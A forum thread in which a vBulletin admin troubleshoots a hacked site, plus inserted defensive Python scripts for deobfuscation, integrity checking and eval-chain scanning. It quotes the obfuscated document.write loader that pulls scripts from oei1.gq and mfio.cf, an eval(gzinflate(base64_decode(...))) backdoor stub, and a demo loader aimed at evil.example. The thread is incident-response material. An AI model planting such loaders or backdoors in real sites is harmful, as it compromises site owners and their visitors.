  • [Forum] Popup injection? (vB 4.2.2 Patch Level 4)

    Hello!
    Since yesterday, whenever I try to log in to my forums (when I click on the username field) I get a popup ad, which I did not insert myself. It happens not only to me, but to members as well.

    What's strange is that it appears even when I log in to the admin panel, or when I try to edit the username of a member in the admin panel. It also appears when you click in the search field.

    I mention I didn't add any new plugin, also I tried disabling all hooks globally and it's still the same. I also removed all banner ads and it was still the same. I looked to see if there are new admin accounts, but it is just mine.

    Other than that, when clicking on the forum pages, no popup appears, just when you click in fields it does.
    I also checked the page source but I could find no weird ad code.

    Here is the page source of the admin login page (it showed 1 popup when I tried to login):
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
    <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
    <head>
    <title>Log in - Forums - vBulletin Admin Control Panel</title>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
    <link rel="stylesheet" type="text/css" href="../cpstyles/global.css?v=422"/>
    <link rel="stylesheet" type="text/css" href="../cpstyles/vBulletin_3_Silver/controlpanel.css?v=422"/>
    <style type="text/css">.page{background-color:white;color:black;}.time{color:silver;}.feature_management_header{font-size:16px;}#category_title_controls{padding-left:10px;font-weight:bold;font-size:14px;}.picker_overlay{background-color:white;color:black;font-size:14px;padding:3px;border:1px solid black;}.selected_marker{margin-right:4px;margin-top:4px;float:left;}.section_name{font-size:14px;font-weight:bold;padding:0.2em 1em;margin:0.5em 0.2em;background-color:white;}.tcat .picker_overlay a,.picker_overlay a,a.section_switch_link{color:blue;}.tcat .picker_overlay a:hover,.picker_overlay a:hover,a.section_switch_link:hover{color:red;}</style>
    <script type="text/javascript">
    <!--
    var SESSIONHASH = "";
    var ADMINHASH = "045bc1e9e281872e8bfad849f39d19c5";
    var SECURITYTOKEN = "1491851501-375837caf47090c879bd5c64a4f1517ea8de8ab7";
    var IMGDIR_MISC = "../cpstyles/vBulletin_3_Silver";
    var CLEARGIFURL = "./clear.gif";
    var AJAXBASEURL = "http://www.mysite.com/forums/acesadm/../";
    var BBURL = "http://www.mysite.com/forums";
    var PATHS = {
    forum : "",
    cms : "",
    blog : ""
    };
    function set_cp_title()
    {
    if (typeof(parent.document) != 'undefined' && typeof(parent.document) != 'unknown' && typeof(parent.document.title) == 'string')
    {
    parent.document.title = (document.title != '' ? document.title : 'vBulletin');
    }
    }
    //-->
    </script>
    <script type="text/javascript" src="../clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js"></script>
    <script type="text/javascript" src="../clientscript/yui/connection/connection-min.js"></script>
    <script type="text/javascript" src="../clientscript/vbulletin-core.js"></script>
    <script type="text/javascript" src="../clientscript/vbulletin_ajax_suggest.js"></script>
    </head>
    <body style="margin:0px" onload="set_cp_title(); document.forms.loginform.vb_login_password.focus()">
    <script type="text/javascript" src="../clientscript/vbulletin_md5.js?v=422"></script>
    <script type="text/javascript">
    <!--
    function js_show_options(objectid, clickedelm)
    {
    fetch_object(objectid).style.display = "";
    clickedelm.disabled = true;
    }
    function js_fetch_url_append(origbit,addbit)
    {
    if (origbit.search(/\?/) != -1)
    {
    return origbit + '&' + addbit;
    }
    else
    {
    return origbit + '?' + addbit;
    }
    }
    function js_do_options(formobj)
    {
    if (typeof(formobj.nojs) != "undefined" && formobj.nojs.checked == true)
    {
    formobj.url.value = js_fetch_url_append(formobj.url.value, 'nojs=1');
    }
    return true;
    }
    //-->
    </script>
    <form action="../login.php?do=login" method="post" name="loginform" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf); js_do_options(this)">
    <input type="hidden" name="url" value="/forums/acesadm/index.php"/>
    <input type="hidden" name="s" value="6583ed39a35588cc17041d37a590a7de"/>
    <input type="hidden" name="securitytoken" value="1491851501-375837caf47090c879bd5c64a4f1517ea8de8ab7"/>
    <input type="hidden" name="logintype" value="cplogin"/>
    <input type="hidden" name="do" value="login"/>
    <input type="hidden" name="vb_login_md5password" value=""/>
    <input type="hidden" name="vb_login_md5password_utf" value=""/>
    <p>&nbsp;</p><p>&nbsp;</p>
    <table class="tborder" cellpadding="0" cellspacing="0" border="0" width="450" align="center"><tr><td>
    <div class="tcat" style="padding:4px; text-align:center"><b>Log in</b></div>
    <table cellpadding="4" cellspacing="0" border="0" width="100%" class="navbody">
    <tr valign="bottom">
    <td><img src="../cpstyles/vBulletin_3_Silver/cp_logo.gif" alt="" title="Powered by vBulletin&reg; Version 4.2.2 Copyright &copy; 2017 vBulletin Solutions, Inc. All rights reserved." border="0"/></td>
    <td>
    <b><a href="http://www.mysite.com/forums/forum.php"> Forum</a></b><br/>
    vBulletin 4.2.2 Admin Control Panel<br/>
    &nbsp;
    </td>
    </tr>
    </table>
    <table cellpadding="4" cellspacing="0" border="0" width="100%" class="logincontrols">
    <col width="50%" style="text-align:right; white-space:nowrap"></col>
    <col></col>
    <col width="50%"></col>
    <tbody>
    <tr>
    <td>User Name</td>
    <td><input type="text" style="padding-left:5px; font-weight:bold; width:250px" name="vb_login_username" value="Key" accesskey="u" tabindex="1" id="vb_login_username"/></td>
    <td>&nbsp;</td>
    </tr>
    <tr>
    <td>Password</td>
    <td><input type="password" style="padding-left:5px; font-weight:bold; width:250px" name="vb_login_password" accesskey="p" tabindex="2" id="vb_login_password"/></td>
    <td>&nbsp;</td>
    </tr>
    <tr style="display: none" id="cap_lock_alert">
    <td>&nbsp;</td>
    <td class="tborder"><strong>Caps Lock is on!</strong><br/>
    <br/>
    Having Caps Lock on may cause you to enter your password incorrectly. You should press Caps Lock to turn it off before entering your password.</td>
    <td>&nbsp;</td>
    </tr>
    </tbody>
    <tbody id="loginoptions" style="display:none">
    <tr>
    <td>Style</td>
    <td><select name="cssprefs" class="login" style="padding-left:5px; font-weight:normal; width:250px" tabindex="5"> <option value="vBulletin_2_Default">vBulletin 2 Default</option>
    <option value="vBulletin_3_Default">vBulletin 3 Default</option>
    <option value="vBulletin_3_Frontend">vBulletin 3 Frontend</option>
    <option value="vBulletin_3_Manual">vBulletin 3 Manual</option>
    <option value="" selected="selected">vBulletin 3 Silver</option>
    </select></td>
    <td>&nbsp;</td>
    </tr>
    <tr>
    <td>Options</td>
    <td>
    <label><input type="checkbox" name="nojs" value="1" tabindex="6"/> Save open navigation groups automatically</label>
    </td>
    <td class="login">&nbsp;</td>
    </tr>
    </tbody>
    <tbody>
    <tr>
    <td colspan="3" align="center">
    <input type="submit" class="button" value=" Log in " accesskey="s" tabindex="3"/>
    <input type="button" class="button" value=" Options " accesskey="o" onclick="js_show_options('loginoptions', this)" tabindex="4"/> </td>
    </tr>
    </tbody>
    </table>
    </td></tr></table>
    </form>
    <script type="text/javascript">
    <!--
    function caps_check(e)
    {
    var detected_on = detect_caps_lock(e);
    var alert_box = fetch_object('cap_lock_alert');
    if (alert_box.style.display == '')
    {
    // box showing already, hide if caps lock turns off
    if (!detected_on)
    {
    alert_box.style.display = 'none';
    }
    }
    else
    {
    if (detected_on)
    {
    alert_box.style.display = '';
    }
    }
    }
    fetch_object('vb_login_password').onkeypress = caps_check;
    //-->
    </script>
    </body>
    </html>

    Could the malicious code be inserted in some file that deals with fields? I don't know where to search for it.


    EDIT: I noticed that vbulletin-core.js was modified on exactly the day the issue appeared. I uploaded an old version of it (from 2015, when the issue wasn't occurring) but the issue is still the same. However, now, at times, the popup appears if the click is made anywhere on the page, not just in the username or search field.

  • #2
    Hello,

    Please upgrade to vBulletin 4.2.4. Does the problem still exist?

    If it does then follow the steps in https://www.vbulletin.com/forum/foru...ring-your-site
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud customization and demonstration site.
    vBulletin 5 Documentation - Updated every Friday. Report issues here.
    vBulletin 5 API - Full / Mobile
    I am not currently available for vB Messenger Chats.

    • #3
      @Ianno

      It could exist in a .js file or in the PHP file that controls these, so you will not see weird code when viewing the page source.

      Even the steps that Wayne Luke suggested will not solve the problem.

      To solve this you need to upload a fresh copy of the files and folders from vB and check any additional files that you added before, checking your MySQL DB too.

      Malware code could be inserted into your site/DB, and it is encrypted, so you must find it to fix the problem completely.

      Hope that helps!

      Web Hosting Forum - Learn web hosting and offering your web hosting plans for free!

      • #4
        4.2.2 Patch Level 4 is 2 patches behind the latest 4.2.2 version (Patch Level 6) so your site was certainly able to be compromised.

        You're going to want to follow these blogs for a full cleanup and then to further secure your site, since there is likely one or more backdoors left by hackers on your site:

        http://www.vbulletin.com/forum/blogs...ve-been-hacked

        http://www.vbulletin.com/forum/blogs...vbulletin-site

        • #5
          Hello and thanks for the responses!
          I saw when the issue occurred 4 days ago that vbulletin_core was modified. I upgraded the vbulletin version to 4.2.4 (from 4.2.2) and removed vBSEO (as yeah, it's unsupported and vulnerable but since my url structure was heavily customized, I kept avoiding that change).

          The forums worked well for 2 days. Today the popups started appearing again. I ran Diagnostics and found that the only suspect and modified file was vbulletin_core.js again. I checked the file and noticed this code was added at the end of the file:
          var _0xe62f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6F\x65\x69\x31\x2E\x67\x71\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x66\x69\x6F\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2])

          The decrypted code looks like this:
          var _0xe62f=['<script type="text/javascript" src="//oei1.gq"></script>','write','<script type="text/javascript" src="//mfio.cf"></script>'];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2])

          I uploaded a fresh copy of vbulletin_core.js but the popups are still there even with the clean vbulletin_core.js. What should I do? It seems the hacker keeps getting into vbulletin_core.js again and again; no other administrator was created, the install folder is deleted, I also deleted files I didn't recognise, and my admin and mod folders in vBulletin are renamed. Is it some exploit? How can I possibly prevent them from getting access to that file?
          Last edited by Ianno; Thu 13th Apr '17, 6:35pm.
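Added example, not posted by anyone in this thread: a small Python script that decodes the hex-escaped string-table obfuscation quoted in the post above without executing it, substitutes the strings back into the code, and lists the hosts the injected script tags load from (the thing to block at the proxy and to grep the rest of the install for). The input is the line from the post with the forum's line-wrap spaces removed; the function and variable names are my own.

```python
import json
import re

# Constructed test input: the obfuscated line quoted in post #5, with the
# stray spaces that the forum's line wrapping put into the hex escapes removed.
INJECTED = (
    r'var _0xe62f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74'
    r'\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63'
    r'\x3D\x22\x2F\x2F\x6F\x65\x69\x31\x2E\x67\x71\x22\x3E\x3C\x2F\x73\x63\x72\x69'
    r'\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x74'
    r'\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70'
    r'\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x66\x69\x6F\x2E\x63\x66\x22\x3E'
    r'\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"];'
    r'document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2])'
)

ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\(.)')
SIMPLE_ESCAPES = {'n': '\n', 'r': '\r', 't': '\t', '0': '\0'}
# The `var _0xNNNN=[ ... ];` string table that this obfuscator style emits.
ARRAY_RE = re.compile(r'var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[(.*?)\]\s*;', re.S)
LITERAL_RE = re.compile(r'"((?:\\.|[^"\\])*)"|\'((?:\\.|[^\'\\])*)\'')
SRC_RE = re.compile(r'''src\s*=\s*["']?(?:https?:)?//([^/"'>\s]+)''', re.I)


def decode_js_escapes(s):
    r"""Turn \xNN, \uNNNN and simple backslash escapes into characters."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return SIMPLE_ESCAPES.get(m.group(3), m.group(3))
    return ESCAPE_RE.sub(repl, s)


def deobfuscate(js):
    """Resolve every string table and substitute its entries back into the
    code. Returns (readable_code, {table_name: [decoded strings]})."""
    tables = {}
    for name, body in ARRAY_RE.findall(js):
        tables[name] = [decode_js_escapes(dq or sq) for dq, sq in LITERAL_RE.findall(body)]
    readable = ARRAY_RE.sub('', js)
    for name, strings in tables.items():
        ref = re.compile(re.escape(name) + r'\[(\d+)\]')

        def sub(m, strings=strings):
            i = int(m.group(1))
            return json.dumps(strings[i]) if i < len(strings) else m.group(0)
        readable = ref.sub(sub, readable)
    return readable, tables


def external_script_hosts(tables):
    """Hosts named in src= attributes inside the decoded strings: what the
    injected code actually loads, in the order it loads them."""
    hosts = []
    for strings in tables.values():
        for s in strings:
            for host in SRC_RE.findall(s):
                if host not in hosts:
                    hosts.append(host)
    return hosts


if __name__ == '__main__':
    code, tables = deobfuscate(INJECTED)
    print(code)
    print('loads scripts from:', external_script_hosts(tables))
```

Running it prints `document["write"]("<script type=\"text/javascript\" src=\"//oei1.gq\"></script>")` followed by the second write, and the host list; the point is that nothing in the injected line is executed, only its string table is read back.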

          • #6
            Are there any non-vbulletin files on your server? home.php or something like that?
            Wayne Luke

            • #7
              No, there is no home.php or anything like that. What should I do, should I resend all the vbulletin files that I sent 2 days ago? Even if I sent the fresh copy of the modified file (vbulletin_core.js), the popups are still there, so I suppose the hacker sneaked the code somewhere else too, I just can't find where.

              I also looked in themes, but I find nothing suspicious. Plus the popups appear on the Default theme as well and even on a freshly installed theme.

              The only theme where popups don't show up is the Mobile theme (the vBulletin one).

              • #8
                If they are editing your files then your server is vulnerable somehow. Either you didn't follow all the steps I listed in the topic above, you have bad plugins installed, your passwords are compromised or your server is compromised.
                Wayne Luke

                • #9
                  Did you clear the cache of your browser after fixing the .js file? JavaScript files would normally be cached by the browser and not be redownloaded unless the cache was cleared, F5 was held down while refreshing the page, or the version number of vB changed.

                  • #10
                    Yes, I cleared the cache and tried on different browsers too, both me and my members. I changed all my passwords, for server, SSH/SFTP, for vBulletin itself. I re-uploaded all the vBulletin files again and the error was gone again for 3 days, but today the popups are back, and this time /clientscript/vbulletin_md5.js was modified, with that same code added at the end of it, but what is weird is that in SFTP client it didn't even show me the file was modified, but vBulletin did in the Suspect file version.

                    I noticed that the whole /clientscript/ folder is writable (CHMOD 777). Is that the default permission? If not, which should it be?

                    • #11
                      It shouldn't be chmod 777. It should be at most 755 and the individual files should be 0644. However you have to ask your hosting provider if those work properly.

                      Seems you still have extra files or the server is compromised from elsewhere.
                      Last edited by Wayne Luke; Tue 18th Apr '17, 6:40pm.
                      Wayne Luke

                      • #12
                        I'm getting the exact same thing since Friday.

                        I was on 4.2.3, and a user complained about this issue, basically a popup on your first click on the page.

                        I upgraded to 4.2.4 and the issue went away.

                        However it came back today. After finding this thread, I ran the Suspect file version checker and in my case
                        "yuiloader-dom-event.js" showed as having extra data; my file explorer still showed the file modified date as when I uploaded it on Friday, however.

                        I reuploaded that file (0644, BTW) and it was about .5k smaller.

                        Cleared the cache on the browsers and it seems to have done the trick, but there does appear to be an issue I've found mentioned here and on at least one other board during my basic searching about the issue, all in the past month or so.
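Added example, not from any poster or from vBulletin: a Python integrity and permission audit along the lines of what the Suspect File Versions tool does, run against a constructed temporary tree rather than a real install. It compares content hashes with a manifest taken from a clean package (so a restored modification date, like the unchanged dates reported in #10 and #12, hides nothing), recovers bytes appended to a file, and lists anything world-writable (the 777 directory from #10 and #11). The file names, the `evil.example` host and the stray `home.php` are constructed placeholders.

```python
import hashlib
import os
import shutil
import stat
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Relative path -> SHA-256 for every regular file under root. Build it
    from a pristine vBulletin package, never from the live server."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def compare_to_manifest(root, manifest):
    """Content-only diff of the live tree against the trusted manifest.
    mtimes are ignored on purpose: the thread shows injected files whose
    dates still looked untouched in the SFTP client."""
    live = build_manifest(root)
    return {
        'modified': sorted(p for p in manifest if p in live and live[p] != manifest[p]),
        'unknown': sorted(p for p in live if p not in manifest),
        'missing': sorted(p for p in manifest if p not in live),
    }


def appended_payload(clean_path, live_path):
    """If live == clean + trailing bytes (the 'extra data at the end' case),
    return the trailing bytes for inspection; otherwise None."""
    with open(clean_path, 'rb') as f:
        clean = f.read()
    with open(live_path, 'rb') as f:
        live = f.read()
    if len(live) > len(clean) and live.startswith(clean):
        return live[len(clean):]
    return None


def world_writable(root):
    """Paths (relative to root) that 'other' may write, e.g. a 777 clientscript/."""
    bad = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                bad.append(os.path.relpath(full, root))
    return sorted(bad)


def demo():
    """Constructed scenario (no real vBulletin files): hash a clean copy, then
    tamper with the live copy the way the thread describes (payload appended,
    mtime put back, directory left 777, stray home.php) and audit it."""
    base = tempfile.mkdtemp()
    try:
        clean_root, live_root = os.path.join(base, 'clean'), os.path.join(base, 'live')
        clean_dir = os.path.join(clean_root, 'clientscript')
        os.makedirs(clean_dir)
        for name, body in (('vbulletin_md5.js', b'function md5hash(){}\n'),
                           ('vbulletin-core.js', b'var vBulletin = {};\n')):
            with open(os.path.join(clean_dir, name), 'wb') as f:
                f.write(body)
            os.chmod(os.path.join(clean_dir, name), 0o644)
        os.chmod(clean_dir, 0o755)
        shutil.copytree(clean_root, live_root)
        manifest = build_manifest(clean_root)

        # Tamper: append a constructed loader, restore the mtime, loosen perms.
        target = os.path.join(live_root, 'clientscript', 'vbulletin_md5.js')
        before = os.stat(target)
        with open(target, 'ab') as f:
            f.write(b'document.write("<script src=\\"//evil.example\\"></script>");\n')
        os.utime(target, ns=(before.st_atime_ns, before.st_mtime_ns))
        os.chmod(os.path.join(live_root, 'clientscript'), 0o777)
        with open(os.path.join(live_root, 'home.php'), 'wb') as f:
            f.write(b'<?php // constructed stray file\n')
        os.chmod(os.path.join(live_root, 'home.php'), 0o644)

        report = compare_to_manifest(live_root, manifest)
        report['appended'] = appended_payload(os.path.join(clean_dir, 'vbulletin_md5.js'), target)
        report['mtime_unchanged'] = os.stat(target).st_mtime_ns == before.st_mtime_ns
        report['world_writable'] = world_writable(live_root)
        return report
    finally:
        shutil.rmtree(base)


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, '=>', value)
```

On a real site, point `build_manifest` at an unpacked copy of the exact vBulletin package you run and `compare_to_manifest` at the web root; the `unknown` list is where a home.php-style dropper or web shell shows up, and `modified` catches the appended loader even though the directory listing shows the old date.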

                        • #13
                          If you have an exploit already installed within your directory and uploaded by your web user, then 0644 won't prevent them from writing to the server. This is why it is important that you manually review every directory of your site for unknown files. They are usually filled with base64 code. We don't use base64 in vBulletin 4. If you have any plugins or addons that use Base64, then you should ditch them as you won't be able to tell what they do easily.

                          For YUI, you can tell the system to load it from a CDN like Google in the Settings under Server Settings and Optimization Options.
                          Wayne Luke

                          • #14
                            We managed to find a backdoor in init_startup plugin in vBulletin:

                            if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) {
                                eval(gzinflate(base64_decode('REMOVED')));
                                exit;
                            }



                            Is it safe to remove all that code and leave just this?
                            if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) {
                                exit;
                            }

                            I also attach the print screen.
                            Last edited by Trevor Hannant; Tue 25th Apr '17, 2:59am. Reason: Base64 code removed
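Added example, not from any poster: a Python scanner for the eval(gzinflate(base64_decode(...))) construct quoted in #14 and for the base64 usage Wayne Luke describes in #13. It peels the wrapping layers with zlib and base64 so you can read what a suspect plugin or file would execute, without executing it, and lists suspicious function calls in the rest of the source. Because the real payload was removed from the post, the sample plugin wraps a harmless constructed echo; the function names are my own.

```python
import base64
import codecs
import re
import zlib

# Pure-Python equivalents of the PHP decoders that get chained around a
# payload, used here only to read the payload, never to run it.
DECODERS = {
    'base64_decode': lambda b: base64.b64decode(b),
    'gzinflate': lambda b: zlib.decompress(b, -15),   # PHP gzinflate = raw DEFLATE
    'gzuncompress': lambda b: zlib.decompress(b),      # PHP gzuncompress = zlib stream
    'str_rot13': lambda b: codecs.encode(b.decode('latin-1'), 'rot13').encode('latin-1'),
    'strrev': lambda b: b[::-1],
}
SUSPECT = ('eval', 'base64_decode', 'gzinflate', 'gzuncompress', 'str_rot13',
           'assert', 'create_function')
CHAIN_RE = re.compile(r"""eval\s*\(\s*((?:[A-Za-z_0-9]+\s*\(\s*)+)['"]([^'"]+)['"]""")
CALL_RE = re.compile(r'\b(' + '|'.join(SUSPECT) + r')\s*\(')


def peel(funcs, literal):
    """Apply the wrapping calls innermost-first to the string literal. Returns
    (decoded_bytes, None), or (None, name) when a decoder is unsupported."""
    data = literal.encode()
    for fn in reversed(funcs):
        if fn not in DECODERS:
            return None, fn
        try:
            data = DECODERS[fn](data)
        except Exception:
            return None, fn
    return data, None


def scan_php(source):
    """Find eval(<decoder chain>('literal')) constructs and show what they decode to."""
    findings = []
    for m in CHAIN_RE.finditer(source):
        funcs = re.findall(r'[A-Za-z_0-9]+', m.group(1))
        decoded, unsupported = peel(funcs, m.group(2))
        findings.append({
            'line': source.count('\n', 0, m.start()) + 1,
            'chain': funcs,
            'decoded': decoded.decode('utf-8', 'replace') if decoded is not None else None,
            'unsupported': unsupported,
        })
    return findings


def suspicious_calls(source):
    """Names from SUSPECT that appear as calls anywhere in the source; worth
    reviewing even when the argument is a variable rather than a literal."""
    return sorted(set(CALL_RE.findall(source)))


def wrap_payload(php_body):
    """Build the gzinflate(base64_decode(...)) wrapping from the post around a
    harmless constructed body, so the scanner has realistic input."""
    co = zlib.compressobj(wbits=-15)
    raw = co.compress(php_body.encode()) + co.flush()
    return base64.b64encode(raw).decode()


# Constructed stand-in for the init_startup plugin quoted in post #14; the real
# payload was removed by the moderators, so a harmless echo takes its place.
SAMPLE_PLUGIN = """if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) {
    eval(gzinflate(base64_decode('%s')));
    exit;
}""" % wrap_payload("echo 'constructed placeholder, not the real payload';")


if __name__ == '__main__':
    for f in scan_php(SAMPLE_PLUGIN):
        print('line %d: eval(%s) decodes to: %s' % (f['line'], '('.join(f['chain']), f['decoded']))
    print('suspicious calls:', suspicious_calls(SAMPLE_PLUGIN))
```

Run `scan_php` over every .php file under the web root and over the plugin code exported from the database (the init_startup hook in #14 lived in the DB, not on disk); a non-empty result from either function in a stock vBulletin 4 file is a review item, and the decoded text tells you whether it is a dropper, a redirect or, as here, something harmless.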
